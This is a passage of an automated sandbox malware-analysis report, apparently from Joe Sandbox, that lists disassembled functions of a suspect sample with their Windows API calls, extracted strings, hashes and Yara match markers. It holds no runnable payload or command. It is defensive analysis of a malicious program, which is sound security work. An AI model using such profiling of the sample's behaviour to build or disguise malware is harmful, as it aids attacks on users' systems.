
Strings

H]o, xrefs: 0042C9BE, 0042C9CB, 0042C9E4, 0042C9F1, 0042CA17

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID: H]o
API String ID: 269201875-1406163642
Opcode ID: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
Instruction ID: eb719cc1bfb6819218d089f87952d2fc75fd927a7e25ce3d54c3d3c6ae1b4b1e
Opcode Fuzzy Hash: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
Instruction Fuzzy Hash: 8E11D671B003105ED7209F2DBC81B5A3AA4AB94765F240637F920CA3D1D378D9864B8D

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 00632BC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00632BF6
__fassign.LIBCMT ref: 00632C06

Part of subcall function 00632A8A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00632B6D

Strings

{-c, xrefs: 00632C4B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID: {-c
API String ID: 2843524283-1400124590
Opcode ID: 26a2aefc81d30bc219ef6623b137fa36f09c6ad660d0dc0b6a69c96c45286d44
Instruction ID: 015789e13c7feab5646b5232f6715252f1a2e909119ed4c4b18ba04f2db18eb1
Opcode Fuzzy Hash: 26a2aefc81d30bc219ef6623b137fa36f09c6ad660d0dc0b6a69c96c45286d44
Instruction Fuzzy Hash: 6201D2B1D0011C5ACB69EA24DC52EEE777AEB45310F0041A9EA05D3281D9719E86CAD4

Function 00665895 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0065E654: RtlEnterCriticalSection.NTDLL(001E0DAF), ref: 0065E663

RtlDeleteCriticalSection.NTDLL(H]o), ref: 006658F7
_free.LIBCMT ref: 00665905

Strings

H]o, xrefs: 006658BF, 006658D5, 006658DA, 006658EB, 006658F6, 006658FD, 00665902, 0066590B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: H]o
API String ID: 1836352639-1406163642
Opcode ID: 59c47195f351c36be380176e98d2262bba69c405ac49a13f79cd5213aac7aaf8
Instruction ID: 7e35e868295de6153acb0c39828dfd52cc9dacccae4506e5f9703d87d2af1ae6
Opcode Fuzzy Hash: 59c47195f351c36be380176e98d2262bba69c405ac49a13f79cd5213aac7aaf8
Instruction Fuzzy Hash: 18116131910324DFDB10DF98D886F5C77B1AF44322F20416AE452EB2A2CB74E906CB19

Function 0043562E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
_free.LIBCMT ref: 0043569E

Strings

H]o, xrefs: 00435658, 0043566E, 00435684, 00435696, 004356A4

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: H]o
API String ID: 1836352639-1406163642
Opcode ID: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
Instruction ID: 52a1ea267b11448604aac72e837bb79cf4a64da9af37325288c97695b126f8a5
Opcode Fuzzy Hash: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
Instruction Fuzzy Hash: 4E118E715003149FDB10DF99D882B5D77B0AB0832AFA1402BE855DB2A2CB78E8428F48

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0065CCD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00665895: RtlDeleteCriticalSection.NTDLL(H]o), ref: 006658F7
Part of subcall function 00665895: _free.LIBCMT ref: 00665905

Part of subcall function 006638D0: _free.LIBCMT ref: 006638F2

RtlDeleteCriticalSection.NTDLL(H]o), ref: 0065CCFD
_free.LIBCMT ref: 0065CD11

Strings

H]o, xrefs: 0065CCE3, 0065CCF0, 0065CCFC, 0065CD16

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$CriticalDeleteSection
String ID: H]o
API String ID: 1906768660-1406163642
Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction ID: ca60ac92d9178168b7cfc97743f264fca1bdc8ad8a216058597ebe3b884cd7af
Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction Fuzzy Hash: 3BE048329147249FC6616B5CFC8555677B69F89362B21443EF405D3262CA20ED198B4C

Function 0042CA6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 0043562E: DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
Part of subcall function 0043562E: _free.LIBCMT ref: 0043569E

Part of subcall function 00433669: _free.LIBCMT ref: 0043368B

DeleteCriticalSection.KERNEL32(006F5D28), ref: 0042CA96
_free.LIBCMT ref: 0042CAAA

Strings

H]o, xrefs: 0042CA7C, 0042CA89, 0042CAAF

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$CriticalDeleteSection
String ID: H]o
API String ID: 1906768660-1406163642
Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction ID: 096468770cdb8f5f473685e72dce597222f10a1d1bc444d33569d92b2b8518b1
Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
Instruction Fuzzy Hash: C1E012329107249FD621AF5EF885A5E7BB49B8D356B61443BF40592162CA24AD058B4C

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 004394BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 004394BD
GetCommandLineW.KERNEL32 ref: 004394C8

Strings

%m, xrefs: 004394C3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CommandLine
String ID: %m
API String ID: 3253501508-1069635998
Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08

Function 0065B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00632AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00632AAD,00000000), ref: 0065B187
GetLastError.KERNEL32 ref: 0065B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00632AAD,00000000), ref: 0065B1F0

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 279b80dd3a6af05aac64a54d8c45157a45f09241de734b4122b22129a3b2f78f
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 6141F530600206AFCF258F65CC54ABE7BB6EF41712F245169EC59AB2A1EB308E09C764

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: 628E.tmp.exePID: 1036, Parent PID: 6288COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	21.8%
Signature Coverage:	27.1%
Total number of Nodes:	133
Total number of Limit Nodes:	10

Executed Functions

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
SysAllocString.OLEAUT32 ref: 0043D608
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
SysAllocString.OLEAUT32 ref: 0043D6A8
SysAllocString.OLEAUT32 ref: 0043D765
VariantInit.OLEAUT32(?), ref: 0043D7D6
SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95

Strings

CfF, xrefs: 0043D600
[J, xrefs: 0043D21D
[B, xrefs: 0043D225
tu, xrefs: 0043D5AC
yv, xrefs: 0043D813
{pqv, xrefs: 0043D120
fF, xrefs: 0043D5D0

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 505850577-1972840126
Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A84
GetCurrentThreadId.KERNEL32 ref: 00408A8E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
GetForegroundWindow.USER32 ref: 00408B8B
ExitProcess.KERNEL32 ref: 00408D07

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DM_e, xrefs: 0040C083
'!, xrefs: 0040C119
Js, xrefs: 0040C0C1
FwPq, xrefs: 0040C0B9
50, xrefs: 0040C1AD

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PWPQ, xrefs: 00418BC7
bd\,, xrefs: 00418BB1
fnga, xrefs: 00418BBC
oQ, xrefs: 00418BD2

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: PWPQ$bd\,$fnga$oQ
API String ID: 0-3706350231
Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

anold~m`, xrefs: 004224DA
d~m`, xrefs: 004224B5
-jkhanold~m`, xrefs: 004224CE

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86

Function 00442080 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00441B50 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96

Function 00441816 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

